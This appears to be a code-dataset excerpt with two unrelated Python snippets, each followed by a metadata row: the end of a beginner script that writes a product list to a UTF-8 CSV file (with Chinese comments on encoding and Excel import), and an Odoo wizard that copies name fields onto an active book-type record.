with open('products.csv', 'w', encoding = 'utf-8') as f:
#写入模式,所以没有products.txt也没关系
# 修正乱码问题,要加encoding = 'utf-8',让语言可被读取
#用csv存取档案,可以用excel开启(直接开excel中文字跑不出,所以:
#资料-取得外部资料-从文字档选UTF-8。分隔符号用逗点)
f.write('商品, 价格\n')
for p in products:
f.write(p[0] + ',' + str(p[1]) +'\n') #字串可以做 + 跟 *
# 但是+只能用在字串加字串,或者整数加整数。所以利用str转成字串
| ccpstcc4330/products | p.py | p.py | py | 1,549 | python | zh | code | 0 | github-code | 90 |
75025564776 | # -*- coding: utf-8 -*-
from odoo import fields, models, api
class ContextWizard(models.TransientModel):
_name = "context.wizard"
_description = "Context Wizard"
first_name = fields.Char(string="First Name")
middle_name = fields.Char(string="Middle Name")
last_name = fields.Char(string="Last Name")
def action_confirm(self):
book_type_nation = self.env["book.type"].search([("id", "=", self._context.get("active_id"))])
book_type_nation.write(
{
"first_name": self.first_name,
"middle_name": self.middle_name,
"last_name": self.last_name,
}
)
| muchhalaamit/custom_addons_15 | library_management/wizards/context_wizard.py | context_wizard.py | py | 669 | python | en | code | 0 | github-code | 90 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.